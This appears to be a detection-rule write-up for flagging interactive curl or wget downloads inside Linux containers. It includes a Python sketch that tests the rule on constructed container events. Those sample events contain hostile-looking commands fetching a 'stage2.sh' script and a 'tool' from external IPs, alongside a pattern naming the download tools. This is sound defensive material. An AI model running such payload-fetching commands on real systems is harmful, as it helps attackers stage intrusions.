
Summary
This rule detects file downloads performed from within a container using command-line tools such as 'curl' or 'wget', which can indicate malicious activity: adversaries may be attempting to extract sensitive data or communicate with command-and-control (C2) servers. The rule focuses on Linux containers and identifies interactive sessions in which these commands are executed to pull content from an external URL or IP address. The downloaded files could be malicious tools, payloads, or data; attackers frequently rely on on-demand downloads to set up further actions without embedding malicious artifacts in container images. When responding to alerts from this rule, analysts should investigate the context of the download to determine whether it is linked to legitimate operations or indicates a security breach.
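As an added illustration, not the rule's own query or data, the following Python sketch applies the logic summarised above to a few constructed container process events. The event field names (container.id, process.name, process.args, process.interactive) and the exclusion of loopback targets are assumptions made for the example.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlsplit

# Constructed sample container process events. Field names are an assumption
# (loosely ECS-like); they are not the rule's real data source.
SAMPLE_EVENTS = [
    {"container.id": "web-1", "process.name": "curl", "process.interactive": True,
     "process.args": ["curl", "-sSL", "https://203.0.113.10/stage2.sh", "-o", "/tmp/s.sh"]},
    {"container.id": "web-1", "process.name": "wget", "process.interactive": True,
     "process.args": ["wget", "-q", "198.51.100.7:8080/tool"]},
    {"container.id": "api-2", "process.name": "curl", "process.interactive": False,
     "process.args": ["curl", "-f", "http://127.0.0.1:8080/healthz"]},   # probe, not interactive
    {"container.id": "api-2", "process.name": "curl", "process.interactive": True,
     "process.args": ["curl", "--version"]},                              # no remote target
    {"container.id": "job-3", "process.name": "apt-get", "process.interactive": True,
     "process.args": ["apt-get", "install", "-y", "vim"]},                # not curl/wget
]

DOWNLOADERS = {"curl", "wget"}
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)

def remote_target(token):
    """Return the host named by a URL or IP[:port] argument, or None.
    Loopback hosts are ignored (assumed tuning) so local health probes do not fire."""
    url = token if SCHEME_RE.match(token) else "//" + token
    host = urlsplit(url).hostname
    if not host:
        return None
    try:
        if ip_address(host).is_loopback:
            return None
    except ValueError:                       # not an IP literal
        if host == "localhost":
            return None
        if not SCHEME_RE.match(token):       # bare flag/path/word, not a URL or IP
            return None
    return host

def interactive_download(event):
    """Apply the rule: interactive curl/wget with a remote URL or IP argument."""
    if event.get("process.name") not in DOWNLOADERS or not event.get("process.interactive"):
        return None
    for arg in event.get("process.args", [])[1:]:
        host = remote_target(arg)
        if host:
            return {"container": event["container.id"], "tool": event["process.name"], "host": host}
    return None

def detect(events):
    return [hit for hit in map(interactive_download, events) if hit]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"ALERT container={hit['container']} tool={hit['tool']} host={hit['host']}")
```

Only the two interactive downloads from external hosts fire; the non-interactive loopback probe, the argument-less invocation and the package-manager run do not.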
Categories
- Containers
Data Sources
- Pod
- Container
ATT&CK Techniques
- T1071
- T1071.001
- T1059
- T1059.004
Created: 2026-02-06